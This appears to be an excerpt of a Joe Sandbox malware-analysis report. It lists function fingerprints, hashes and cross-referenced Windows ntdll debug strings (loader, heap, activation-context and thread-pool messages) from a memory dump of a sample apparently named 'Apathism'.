                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                          • API String ID: 0-861424205
                          • Opcode ID: f7870a5251f77bcbf2991b801643c79ddca413e2c5322f8e9c457547f49647cd
                          • Instruction ID: 2610eae1a00e26b6aa1b3f9dce18788972eb99f0b5ce934a2a48c94ccc7e44c0
                          • Opcode Fuzzy Hash: f7870a5251f77bcbf2991b801643c79ddca413e2c5322f8e9c457547f49647cd
                          • Instruction Fuzzy Hash: 73312436F00314A7E7248A958C90FBB777CFFA4644F068069FA04AB24AD6B09E01C6E1
                          Strings
                          • LdrpInitializeImportRedirection, xrefs: 223A8177, 223A81EB
                          • minkernel\ntdll\ldrredirect.c, xrefs: 223A8181, 223A81F5
                          • minkernel\ntdll\ldrinit.c, xrefs: 2236C6C3
                          • LdrpInitializeProcess, xrefs: 2236C6C4
                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 223A81E5
                          • Loading import redirection DLL: '%wZ', xrefs: 223A8170
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                          • API String ID: 0-475462383
                          • Opcode ID: f03f3a109913896d53d7dd1e17e39459342fbc7807913ad838ef7f5aa51aeec1
                          • Instruction ID: 8223df5f64ff9f38d71f408926b4c9b8dda0958fa68c8ad0716d5f5698a572bb
                          • Opcode Fuzzy Hash: f03f3a109913896d53d7dd1e17e39459342fbc7807913ad838ef7f5aa51aeec1
                          • Instruction Fuzzy Hash: 50314471744341AFD324DF28CD95E2A77E4EF94B14F004A68F985AB295EA34EC04C7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-4253913091
                          • Opcode ID: 5cb9b64c671e69f9135b0aa13f6274570b6c005cffd15ee95f5d1e0ab734ce0c
                          • Instruction ID: a88acd3ea0aa6238bf0351258a7f6bb56a3ef768258830fff100ee1df3563f66
                          • Opcode Fuzzy Hash: 5cb9b64c671e69f9135b0aa13f6274570b6c005cffd15ee95f5d1e0ab734ce0c
                          • Instruction Fuzzy Hash: 83F18771B00705DFDB19CF68CA90F6AB7F5FB45304F1082A9E5569B392DB34AA81CB90
                          APIs
                          Strings
                          • LdrpCheckModule, xrefs: 2239A117
                          • Failed to allocated memory for shimmed module list, xrefs: 2239A10F
                          • minkernel\ntdll\ldrinit.c, xrefs: 2239A121
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-161242083
                          • Opcode ID: 9fb63c4f5b0241106f5c41b076b4bb8189082a47027410672d5b6555c6d942aa
                          • Instruction ID: 4596af686cff430121093ae313c12de8b0811a54e1fe305225f2133839de9c14
                          • Opcode Fuzzy Hash: 9fb63c4f5b0241106f5c41b076b4bb8189082a47027410672d5b6555c6d942aa
                          • Instruction Fuzzy Hash: 7971C070A003059FDB18DFA9CA80FAEB7F4EB49304F15462DD906AB215EB39AE45CB50
                          APIs
                          Strings
                          • LdrpInitializePerUserWindowsDirectory, xrefs: 223A82DE
                          • Failed to reallocate the system dirs string !, xrefs: 223A82D7
                          • minkernel\ntdll\ldrinit.c, xrefs: 223A82E8
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-1783798831
                          • Opcode ID: a25d27a3688301219d68973916a7fa5a406311a4dd3f3432a7549e80ed8b0ae5
                          • Instruction ID: e3b03839b522e1bba8138e1a5ad669f821eb2c8405a4034ea0575ff69cba480e
                          • Opcode Fuzzy Hash: a25d27a3688301219d68973916a7fa5a406311a4dd3f3432a7549e80ed8b0ae5
                          • Instruction Fuzzy Hash: B541DF71940300ABC724DBA5C984F6B77E8FF48B50F014E2AF948D7295EB74E900CBA5
                          APIs
                          Strings
                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 223B4888
                          • minkernel\ntdll\ldrredirect.c, xrefs: 223B4899
                          • LdrpCheckRedirection, xrefs: 223B488F
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                          • API String ID: 3446177414-3154609507
                          • Opcode ID: 92149a6c9499ecf953d9a40e35d24c21a0eaf41beb5af403f228429bdd7cd882
                          • Instruction ID: 4ad9e21540538bdc445f0546582084565ce739ba4fcf3b209dd309dce7c17c3f
                          • Opcode Fuzzy Hash: 92149a6c9499ecf953d9a40e35d24c21a0eaf41beb5af403f228429bdd7cd882
                          • Instruction Fuzzy Hash: F841D332A007909BCF11CE59D960A167BE8AFA9660F020669EE58D7A16D731D900CB95
                          APIs
                            • Part of subcall function 22372DF0: LdrInitializeThunk.NTDLL ref: 22372DFA
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22370BA3
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22370BB6
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22370D60
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22370D74
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                          • String ID:
                          • API String ID: 1404860816-0
                          • Opcode ID: da351a70653c9a87da9c1a47cd00e632d6afc77551db86550865290288e9aa97
                          • Instruction ID: 66496775407809ef16020b834c008e50730338607d29a9a9170ebc1123c128b2
                          • Opcode Fuzzy Hash: da351a70653c9a87da9c1a47cd00e632d6afc77551db86550865290288e9aa97
                          • Instruction Fuzzy Hash: 5E426A71900715DFDB60CF24C990BAAB7F5FF08304F1445AAE999EB242E774AA84CF61
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: b540eda534f10f7354a7c211ea71ce8993f71f846836513cc4983f4a73ca7fd0
                          • Instruction ID: c63900639e617775b17ec29b1d2b70490d300d7d7a240d47d8b39e05ff8076a8
                          • Opcode Fuzzy Hash: b540eda534f10f7354a7c211ea71ce8993f71f846836513cc4983f4a73ca7fd0
                          • Instruction Fuzzy Hash: B6F1F672E007158BCB1CCFA9C9A067EBBF5AF98210719417DD856EB381E634EB81CB54
                          APIs
                          Strings
                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2233063D
                          • kLsE, xrefs: 22330540
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                          • API String ID: 3446177414-2547482624
                          • Opcode ID: 6a5c51a165b5eb408e8857a84fd17ecd0a1a530acd3a64362e4ba8111e1766ae
                          • Instruction ID: 9fd1074b4b9bc8afed56f1f82fe0c0371ee49b3e0ff05d1c339213771023e3b3
                          • Opcode Fuzzy Hash: 6a5c51a165b5eb408e8857a84fd17ecd0a1a530acd3a64362e4ba8111e1766ae
                          • Instruction Fuzzy Hash: 77518B72A047469BD326DF65C680797B7E4EF84304F00893EEAAA87241E774D745CBD2
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                          • API String ID: 0-379654539
                          • Opcode ID: 9296f919a43f5f8e167b471c68c6e880cb04801085035d07c66c58c553a4fa02
                          • Instruction ID: cb672e199b7424268b5ee7ce47f2b4c456af5302e81693b2939185763a204cc6
                          • Opcode Fuzzy Hash: 9296f919a43f5f8e167b471c68c6e880cb04801085035d07c66c58c553a4fa02
                          • Instruction Fuzzy Hash: E0C18C75208782CFD712CF18C544B5AB7E8FF89718F004A6AF9958B351E778CA49CB92
                          Strings
                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2236855E
                          • minkernel\ntdll\ldrinit.c, xrefs: 22368421
                          • LdrpInitializeProcess, xrefs: 22368422
                          • @, xrefs: 22368591
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1918872054
                          • Opcode ID: e13636a8e2f0ac106fd470cc4aceae4772924429107ed909520517eb35ba428d
                          • Instruction ID: 1ef98d9456c30cf7a94abb2c3d3ae350832eb6c934fd03a7a3e4ef4635d527fe
                          • Opcode Fuzzy Hash: e13636a8e2f0ac106fd470cc4aceae4772924429107ed909520517eb35ba428d
                          • Instruction Fuzzy Hash: 41916A71508344AFD721CA61C990FBBBBECFF88744F80492EFA8492155E774DA48CB66
                          Strings
                          • .Local, xrefs: 223628D8
                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 223A21D9, 223A22B1
                          • SXS: %s() passed the empty activation context, xrefs: 223A21DE
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 223A22B6
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                          • API String ID: 0-1239276146
                          • Opcode ID: d95e3eafd51d1dda9bb73377995c6e9cc661d641fb39a7f06ff7324e4b0efe70
                          • Instruction ID: 89f7754a7c008e783b4d533a72a3b3dfd56ffebbc1649d47969481de5ade94a2
                          • Opcode Fuzzy Hash: d95e3eafd51d1dda9bb73377995c6e9cc661d641fb39a7f06ff7324e4b0efe70
                          • Instruction Fuzzy Hash: F6A1AF31901329DBDB24CF64CD84BA9B3B9FF58318F2241E9D948AB255D7B09E80CF94
                          Strings
                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 223A342A
                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 223A3456
                          • RtlDeactivateActivationContext, xrefs: 223A3425, 223A3432, 223A3451
                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 223A3437
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                          • API String ID: 0-1245972979
                          • Opcode ID: cc1bb9c2f765eeef47ddcae8384c374cfdd07c2f3b874e5b6d4429286f829ceb
                          • Instruction ID: c6c51fadc31443d8171a902ebd1805b662790b947ded5f3a1a06c1c1710b5054
                          • Opcode Fuzzy Hash: cc1bb9c2f765eeef47ddcae8384c374cfdd07c2f3b874e5b6d4429286f829ceb
                          • Instruction Fuzzy Hash: FF612832B04712ABC326CF18C991F3AB3E9EF90B64F108569E9559F349D730E900CBA5
                          Strings
                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2239106B
                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 223910AE
                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 22390FE5
                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 22391028
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                          • API String ID: 0-1468400865
                          • Opcode ID: 63206e3182d873f70aafc666d00b4a661687cee96393e5e04ea3a7cb55c1522f
                          • Instruction ID: f6f84c2a4289d991aaa1ff30e09817ad2f1e16d890c0b04737d87883174dc126
                          • Opcode Fuzzy Hash: 63206e3182d873f70aafc666d00b4a661687cee96393e5e04ea3a7cb55c1522f
                          • Instruction Fuzzy Hash: 6C71BEB29043449FDB21CF14C984F8B7BA8AF95764F400568FA498B24AD734D688CFE6
                          Strings
                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2234327D
                          • HEAP[%wZ]: , xrefs: 22343255
                          • HEAP: , xrefs: 22343264
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                          • API String ID: 0-617086771
                          • Opcode ID: 80de809182dd9228adb8bba5570fe91554e56b218d5cb951754403ecb50036f8
                          • Instruction ID: b82d43cd5877e68fda98ee163ad609665b940c9bdaff28595f7a8480fc4e8d69
                          • Opcode Fuzzy Hash: 80de809182dd9228adb8bba5570fe91554e56b218d5cb951754403ecb50036f8
                          • Instruction Fuzzy Hash: 2192AB70E043489FDB15CF68D540BAEBBF1FF48304F14819AE89AAB292DB74A941CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: $@
                          • API String ID: 0-1077428164
                          • Opcode ID: ceddc9c98e80b95412edf08059bb974835a96cd1d7a600fcc83d8ac02b318e02
                          • Instruction ID: 96506a5ccd21efd93182ee1391b531283c58347448bf438ceaa7f7bb85f24e6a
                          • Opcode Fuzzy Hash: ceddc9c98e80b95412edf08059bb974835a96cd1d7a600fcc83d8ac02b318e02
                          • Instruction Fuzzy Hash: 20C27971A083819FD725CF24C980FABBBE5AF8D744F04892DE989C7242D734D955CBA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: FilterFullPath$UseFilter$\??\
                          • API String ID: 0-2779062949
                          • Opcode ID: 6855e1ff1465b515542cffa082d6683871b86cfbab3c2f6b2cfaa0b2e8bf999e
                          • Instruction ID: 48612fe2b56a70af5d96e0a981c7b6c13728d94bcc06fe798a6c076922390015
                          • Opcode Fuzzy Hash: 6855e1ff1465b515542cffa082d6683871b86cfbab3c2f6b2cfaa0b2e8bf999e
                          • Instruction Fuzzy Hash: CCA18D719127299BDB31DF24CC88BEAB7B8EF44704F1005EAE908AB250D7399E85CF51
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-1334570610
                          • Opcode ID: 57d6f519df7211a6973b22d0fd069f35aa4f3c0c4ed4ae2eefba975f4cc47b0b
                          • Instruction ID: 95376917daf059f4a1b64a20a3b3c197e7164830f43c495713e9175321fcad1c
                          • Opcode Fuzzy Hash: 57d6f519df7211a6973b22d0fd069f35aa4f3c0c4ed4ae2eefba975f4cc47b0b
                          • Instruction Fuzzy Hash: 3A61BD71B00301DFD718CF28C580B5ABBE5FF45308F1486AAE8998F296DB70E981CB95
                          Strings
                          • @, xrefs: 223EC1F1
                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 223EC1C5
                          • PreferredUILanguages, xrefs: 223EC212
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                          • API String ID: 0-2968386058
                          • Opcode ID: c4c1de48ab05ba9d23dbc98a077b9e05faeb7f5b609687bb04662147fdb9067a
                          • Instruction ID: 6f1740c795f930e29d0ca5ee530dda785676b054f2b9bbf566e376d39cc6bcaa
                          • Opcode Fuzzy Hash: c4c1de48ab05ba9d23dbc98a077b9e05faeb7f5b609687bb04662147fdb9067a
                          • Instruction Fuzzy Hash: 3C416072E10319EBDF12CBD4C991FDEB7B8AF14B04F10456AEA0AB7280D7749A48CB50
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                          • API String ID: 0-1373925480
                          • Opcode ID: 0c3d1f035f47af1992ebda8b2c6a54ade44ab2c05817f83424a51cfe3f7708aa
                          • Instruction ID: b41c4cc3bf38d192c6323504684bb638e68e55ee83e1c7ab9eed27f0e897b23e
                          • Opcode Fuzzy Hash: 0c3d1f035f47af1992ebda8b2c6a54ade44ab2c05817f83424a51cfe3f7708aa
                          • Instruction Fuzzy Hash: 864100329143488BEB22CBA4C940B9DBBF8EF65364F24059AEA41FF781DB348D01CB10
                          Strings
                          • PS0", xrefs: 2233A348
                          • RtlpResUltimateFallbackInfo Enter, xrefs: 2233A2FB
                          • RtlpResUltimateFallbackInfo Exit, xrefs: 2233A309
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: PS0"$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                          • API String ID: 0-470575045
                          • Opcode ID: 6f8a891e3bbb4f9869f7e577cf4d81c6630d3a477a66ac763833e874eea91947
                          • Instruction ID: bdd237f7ea4f5e03d4c230af66d30c25a0aa50ddd728ef454ce4be65654e3bfc
                          • Opcode Fuzzy Hash: 6f8a891e3bbb4f9869f7e577cf4d81c6630d3a477a66ac763833e874eea91947
                          • Instruction Fuzzy Hash: 3B41CF31A04B45DBCB16CF69C980B5E77F4FF86714F2041A9E904DB2A2E779DA00CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-2558761708
                          • Opcode ID: 51be870681c75acf77b807ac2563bf608967453751e1467bbb1bedab5e1db1d4
